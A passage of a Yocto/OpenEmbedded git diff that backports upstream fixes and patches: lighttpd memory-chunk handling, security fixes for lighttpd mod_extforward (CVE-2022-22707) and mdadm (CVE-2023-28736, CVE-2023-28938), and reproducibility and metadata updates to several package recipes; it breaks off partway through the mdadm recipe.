diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+  "Memory Growth with PUT and full buffered streams"
+  https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backword compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c            | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h            |  2 +
+ src/http-header-glue.c |  2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ 
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+-    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++    size_t x = 1024;
++    while (x < sz && x < (1u << 30)) x <<= 1;
++    chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+ 
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++    chunk_buf_sz = 8192;
+     chunkqueue_default_tempdirs = NULL;
+     chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ 	free(c);
+ }
+ 
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++    /* future: might have buckets of certain sizes, up to socket buf sizes */
++    if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++        --chunks_oversized_n;
++        chunk *c = chunks_oversized;
++        chunks_oversized = c->next;
++        return c;
++    }
++    return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++    if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++        ++chunks_oversized_n;
++        chunk **co = &chunks_oversized;
++        while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++        c->next = *co;
++        *co = c;
++    }
++    else
++        chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+     chunk *c;
+     buffer *b;
+-    if (chunks) {
+-        c = chunks;
+-        chunks = c->next;
++    if (sz <= chunk_buf_sz) {
++        if (chunks) {
++            c = chunks;
++            chunks = c->next;
++        }
++        else
++            c = chunk_init(chunk_buf_sz);
++            /* future: might choose to pop from chunks_oversized, if available
++             * (even if larger than sz) rather than allocating new chunk
++             * (and if doing so, might replace chunks_oversized_n) */
+     }
+     else {
+-        c = chunk_init(chunk_buf_sz);
++        /*(round up to nearest chunk_buf_sz)*/
++        sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++        c = chunk_pop_oversized(sz);
++        if (NULL == c)
++            c = chunk_init(sz);
+     }
+     c->next = chunk_buffers;
+     chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+     return b;
+ }
+ 
++buffer * chunk_buffer_acquire(void) {
++    return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+     if (NULL == b) return;
+-    if (b->size >= chunk_buf_sz && chunk_buffers) {
++    if (chunk_buffers) {
+         chunk *c = chunk_buffers;
+         chunk_buffers = c->next;
+         c->mem = b;
+-        c->next = chunks;
+-        chunks = c;
+         buffer_clear(b);
++        if (b->size == chunk_buf_sz) {
++            c->next = chunks;
++            chunks = c;
++        }
++        else if (b->size > chunk_buf_sz)
++            chunk_push_oversized(c, b->size);
++        else
++            chunk_free(c);
+     }
+     else {
+         buffer_free(b);
+     }
+ }
+ 
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++    if (sz > chunk_buffer_string_space(b)) {
++        sz += b->used ? b->used : 1;
++        buffer * const cb = chunk_buffer_acquire_sz(sz);
++        /* swap buffer contents and copy original b->ptr into larger b->ptr */
++        /*(this does more than buffer_move())*/
++        buffer tb = *b;
++        *b = *cb;
++        *cb = tb;
++        if ((b->used = tb.used))
++            memcpy(b->ptr, tb.ptr, tb.used);
++        chunk_buffer_release(cb);
++    }
++    return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+     if (sz <= chunk_buf_sz) {
+         if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+         sz = chunk_buf_sz;
+     }
+     else {
+-        sz = (sz + 8191) & ~8191uL;
+-        /* future: might have buckets of certain sizes, up to socket buf sizes*/
+-        if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+-            chunk *c = chunks_oversized;
+-            chunks_oversized = c->next;
+-            return c;
+-        }
++        /*(round up to nearest chunk_buf_sz)*/
++        sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++        chunk *c = chunk_pop_oversized(sz);
++        if (c) return c;
+     }
+ 
+     return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+     }
+     else if (sz > chunk_buf_sz) {
+         chunk_reset(c);
+-        chunk **co = &chunks_oversized;
+-        while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+-        c->next = *co;
+-        *co = c;
++        chunk_push_oversized(c, sz);
+     }
+     else {
+         chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+         chunk_free(c);
+     }
+     chunks_oversized = NULL;
++    chunks_oversized_n = 0;
+ }
+ 
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+ 
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+ 
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+         if (avail < toread) {
+             /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+             avail = avail ? avail - 1 + toread : toread;
+-            buffer_string_prepare_append(b, avail);
++            avail = chunk_buffer_prepare_append(b, avail);
+         }
+ 
+         n = read(fd, b->ptr+buffer_string_length(b), avail);
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded.  lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+  "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+  https://redmine.lighttpd.net/issues/3134
+  (not yet written or published)
+  CVE-2022-22707
+
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+         while (s[i] == ' ' || s[i] == '\t') ++i;
+         if (s[i] == ';') { ++i; continue; }
+         if (s[i] == ',') {
+-            if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++            if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+             offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+             ++i;
+             continue;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+ 
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ 
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+-    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++    chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+ 
+ void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Lightweight high-performance web server"
 HOMEPAGE = "http://www.lighttpd.net/"
+DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
 BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
 
 LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
                      lighttpd-module-accesslog"
 
 SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
+        file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
         file://index.html.lighttpd \
         file://lighttpd.conf \
         file://lighttpd \
         file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
+        file://default-chunk-size-8k.patch \
+        file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
         "
 
 SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Rotates, compresses, removes and mails system log files"
 SECTION = "console/utils"
-HOMEPAGE = "https://github.com/logrotate/logrotate/issues"
+HOMEPAGE = "https://github.com/logrotate/logrotate/"
+DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
 LICENSE = "GPLv2"
 
 # TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
 SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
 SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
 
+# These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used
+CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
+
 PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
 
 PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
+lsb-release maintains it's own copy of help2man. Include the support
+for specifying SOURCE_DATE_EPOCH from upstream.
+
+Upstream-Status: Pending
+
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+
+diff --git a/help2man b/help2man
+index 13015c2..63439db 100755
+--- a/help2man
++++ b/help2man
+@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
+ 	or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
+ } qw(help), $opt_version_key;
+ 
+-my $date = strftime "%B %Y", localtime;
++my $epoch_secs = time;
++if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
++{
++    $epoch_secs = $1;
++    $ENV{TZ} = 'UTC0';
++}
++
++my $date = strftime "%B %Y", localtime $epoch_secs;
+ (my $program = $ARGV[0]) =~ s!.*/!!;
+ my $package = $program;
+ my $version;
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
 SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
            file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
            file://0001-Remove-timestamp-from-manpage.patch \
+           file://help2man-reproducibility.patch \
            "
 
 SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb
index b3adfd57af..7c85bf23fc 100644
--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
 Its name stands for LiSt Open Files, and it does just that."
 HOMEPAGE = "http://people.freebsd.org/~abe/"
 SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
 LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
 
 # Upstream lsof releases are hosted on an ftp server which times out download
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb
index 6633755a20..505b7b14fc 100644
--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
 CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
 SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
 
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
            file://0001-build-Add-option-to-select-libc-implementation.patch \
            file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
            file://0004-guard-mallocopt-with-__GLIBC__.patch \
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb
index bb3d2a6fe3..bd1c007de6 100644
--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Lossless data compressor based on the LZMA algorithm"
 HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
+DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
 SECTION = "console/utils"
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb
index 5b017e8023..7a30f9d722 100644
--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
 HOMEPAGE = "http://man-db.nongnu.org/"
+DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
 LICENSE = "LGPLv2.1 & GPLv2"
 LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
                     file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"
@@ -12,6 +13,7 @@ SRC_URI[sha256sum] = "5d4aacd9e8876d6a3203a889860c3524c293c38f04111a3350deab8a6c
 
 DEPENDS = "libpipeline gdbm groff-native base-passwd"
 RDEPENDS_${PN} += "base-passwd"
+PACKAGE_WRITE_DEPS += "base-passwd"
 
 # | /usr/src/debug/man-db/2.8.0-r0/man-db-2.8.0/src/whatis.c:939: undefined reference to `_nl_msg_cat_cntr'
 USE_NLS_libc-musl = "no"
@@ -21,6 +23,11 @@ inherit gettext pkgconfig autotools systemd
 EXTRA_OECONF = "--with-pager=less --with-systemdsystemunitdir=${systemd_unitdir}/system"
 EXTRA_AUTORECONF += "-I ${S}/gl/m4"
 
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
 do_install() {
 	autotools_do_install
 
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb
index ead348b92e..8e3b7a65e0 100644
--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Midnight Commander is an ncurses based file manager"
 HOMEPAGE = "http://www.midnight-commander.org/"
+DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
 SECTION = "console/utils"
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
new file mode 100644
index 0000000000..8e0a06cbc7
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
+From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
+From: Blazej Kucman <blazej.kucman@intel.com>
+Date: Fri, 3 Dec 2021 15:31:15 +0100
+Subject: mdadm: block creation with long names
+
+This fixes buffer overflows in create_mddev(). It prohibits
+creation with not supported names for DDF and native. For IMSM,
+mdadm will do silent cut to 16 later.
+
+Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
+Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
+CVE: CVE-2023-28736
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ mdadm.8.in | 5 +++++
+ mdadm.c    | 9 ++++++++-
+ mdadm.h    | 5 +++++
+ 3 files changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/mdadm.8.in b/mdadm.8.in
+index 28d773c2..68e100cb 100644
+--- a/mdadm.8.in
++++ b/mdadm.8.in
+@@ -2186,6 +2186,11 @@ is run, but will be created by
+ .I udev
+ once the array becomes active.
+ 
++The max length md-device name is limited to 32 characters.
++Different metadata types have more strict limitation
++(like IMSM where only 16 characters are allowed).
++For that reason, long name could be truncated or rejected, it depends on metadata policy.
++
+ As devices are added, they are checked to see if they contain RAID
+ superblocks or filesystems.  They are also checked to see if the variance in
+ device size exceeds 1%.
+diff --git a/mdadm.c b/mdadm.c
+index 91e67467..26299b2e 100644
+--- a/mdadm.c
++++ b/mdadm.c
+@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
+ 			mdfd = open_mddev(devlist->devname, 1);
+ 			if (mdfd < 0)
+ 				exit(1);
+-		} else
++		} else {
++			char *bname = basename(devlist->devname);
++
++			if (strlen(bname) > MD_NAME_MAX) {
++				pr_err("Name %s is too long.\n", devlist->devname);
++				exit(1);
++			}
+ 			/* non-existent device is OK */
+ 			mdfd = open_mddev(devlist->devname, 0);
++		}
+ 		if (mdfd == -2) {
+ 			pr_err("device %s exists but is not an md array.\n", devlist->devname);
+ 			exit(1);
+diff --git a/mdadm.h b/mdadm.h
+index 54567396..c7268a71 100644
+--- a/mdadm.h
++++ b/mdadm.h
+@@ -1880,3 +1880,8 @@ enum r0layout {
+ #define INVALID_SECTORS 1
+ /* And another special number needed for --data_offset=variable */
+ #define VARIABLE_OFFSET 3
++
++/**
++ * This is true for native and DDF, IMSM allows 16.
++ */
++#define MD_NAME_MAX 32
+-- 
+cgit 
+
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
new file mode 100644
index 0000000000..1e2990d79a
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
+From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
+From: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Date: Tue, 27 Jul 2021 10:25:18 +0200
+Subject: Fix memory leak after "mdadm --detail"
+
+Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
+CVE: CVE-2023-28938
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+ 
+ Detail.c | 20 +++++++++-----------
+ 1 file changed, 9 insertions(+), 11 deletions(-)
+
+diff --git a/Detail.c b/Detail.c
+index ad56344f..d3af0ab5 100644
+--- a/Detail.c
++++ b/Detail.c
+@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
+ 	int spares = 0;
+ 	struct stat stb;
+ 	int failed = 0;
+-	struct supertype *st;
++	struct supertype *st = NULL;
+ 	char *subarray = NULL;
+ 	int max_disks = MD_SB_DISKS; /* just a default */
+ 	struct mdinfo *info = NULL;
+-	struct mdinfo *sra;
++	struct mdinfo *sra = NULL;
+ 	struct mdinfo *subdev;
+ 	char *member = NULL;
+ 	char *container = NULL;
+@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
+ 	if (!sra) {
+ 		if (md_get_array_info(fd, &array)) {
+ 			pr_err("%s does not appear to be an md device\n", dev);
+-			close(fd);
+-			return rv;
++			goto out;
+ 		}
+ 	}
+ 	external = (sra != NULL && sra->array.major_version == -1 &&
+@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
+ 			    sra->devs == NULL) {
+ 				pr_err("Array associated with md device %s does not exist.\n",
+ 				       dev);
+-				close(fd);
+-				sysfs_free(sra);
+-				return rv;
++				goto out;
+ 			}
+ 			array = sra->array;
+ 		} else {
+ 			pr_err("cannot get array detail for %s: %s\n",
+ 			       dev, strerror(errno));
+-			close(fd);
+-			return rv;
++			goto out;
+ 		}
+ 	}
+ 
+@@ -827,10 +823,12 @@ out:
+ 	close(fd);
+ 	free(subarray);
+ 	free(avail);
+-	for (d = 0; d < n_devices; d++)
+-		free(devices[d]);
++	if (devices)
++		for (d = 0; d < n_devices; d++)
++			free(devices[d]);
+ 	free(devices);
+ 	sysfs_free(sra);
++	free(st);
+ 	return rv;
+ }
+ 
+-- 
+cgit 
+
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb
index 001d3331a7..ca326fd1cb 100644
--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Tool for managing software RAID under Linux"
 HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
+DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
 
 # Some files are GPLv2+ while others are GPLv2.
 LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
